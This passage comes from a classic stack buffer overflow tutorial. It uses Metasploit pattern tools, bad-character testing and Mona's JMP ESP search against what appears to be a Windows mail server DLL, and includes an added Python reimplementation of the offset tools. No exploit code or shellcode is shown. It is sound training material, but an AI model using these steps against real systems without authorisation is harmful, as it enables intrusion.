In this section, there are two registers to remember:
ESP - Extended Stack Pointer: points to the top of the stack, where values are pushed and popped
EIP - Extended Instruction Pointer: holds the address of the instruction being executed at any given time
At this stage we have overwritten the Extended Instruction Pointer (EIP) register with our input buffer of A's (\x41). Now we need to replace the A's with a unique string of 2700 bytes generated with the pattern_create.rb tool in Kali:
In the debugger, we can see that the EIP register has been overwritten with the hex bytes 39694438. Let's calculate the offset using the pattern_offset.rb tool in Kali:
root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
[*] Exact match at offset 2606
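To make the two tool invocations above less of a black box, here is an added Python reimplementation of the logic behind pattern_create.rb and pattern_offset.rb (not code from the original write-up or from Metasploit). It shows why the debugger value 39694438 maps to offset 2606: x86 stores EIP little-endian, so the bytes in memory were 38 44 69 39, i.e. the pattern fragment "8Di9".

```python
import string
from typing import Optional

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> bytes:
    """Generate the cyclic 'Aa0Aa1Aa2...' pattern used by pattern_create.rb.

    The pattern is built from 3-byte triples (upper, lower, digit), so every
    4-byte window is unique for lengths up to 26 * 26 * 10 * 3 = 20280 bytes.
    That uniqueness is what lets a register value be mapped back to an offset.
    """
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value: str, length: int = 2700) -> Optional[int]:
    """Return the offset of VALUE inside the pattern, or None if not found.

    VALUE is either 4 literal pattern characters (e.g. '8Di9') or the 8-digit
    hex register value exactly as the debugger shows it (e.g. '39694438').
    A hex value is reversed byte-wise because x86 is little-endian:
    EIP=0x39694438 was loaded from the bytes 38 44 69 39 -> b'8Di9'.
    """
    needle = value.encode()
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = bytes.fromhex(value)[::-1]
    pos = pattern_create(length).find(needle)
    return pos if pos >= 0 else None


if __name__ == "__main__":
    # Reproduces the pattern_offset.rb result from the debugger value above.
    print("Exact match at offset", pattern_offset("39694438", 2700))  # 2606
```

A value such as 41414141 (the A's from the first crash) returns None, which is the same "no match" a run of pattern_offset.rb gives for a non-pattern register value.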
The offset 2606 means that the first 2606 bytes of the 2700-byte payload fill the buffer up to EIP, and the next 4 bytes are the ones that overwrite the EIP address. Let's translate this into a new, modified buffer string in our exploit:
Now if we watch the EIP register, we can see that it is cleanly overwritten by B's (\x42).
Add space for shellcode
We can see that the ESP register points directly to the beginning of our buffer of C's, but the shellcode requires roughly 350-400 bytes of space, and the 90 bytes we currently have won't be enough.
Let's increase the total buffer from 2700 to 3500 to make a larger space for our shellcode:
There may be certain characters that are considered bad and shouldn't be used in our buffer, return address, or shellcode, such as the NULL byte (\x00), the carriage return (\x0d) and the line feed (\x0a).
To test which characters are bad, we will send the following badchars array with our exploit:
In the debugger, looking at the memory ESP points to, we can see that \x00, \x0a and \x0d truncate our buffer and do not appear correctly at that memory location.
NOTE: This process should be repeated until no more bad characters are found.
Redirect Execution Flow
In this last part, we need to get EIP to point to ESP using the JMP ESP technique.
While the application is paused in the debugger, we will use the Mona script to list the loaded modules with the command:
!mona modules
The output contains a list of the DLLs and EXEs the application may use. We need to find a library with no memory protections (ASLR, DEP or stack canaries) whose address range does not contain bad characters. In our case we found SLMFC.DLL, which has no memory protections.
The next step is to locate the address of a JMP ESP opcode (\xff\xe4) in this DLL using the following Mona command:
!mona find -s "\xff\xe4" -m SLMFC.DLL
Set a breakpoint on this instruction address, 5F4A358F (using F2), and update our exploit: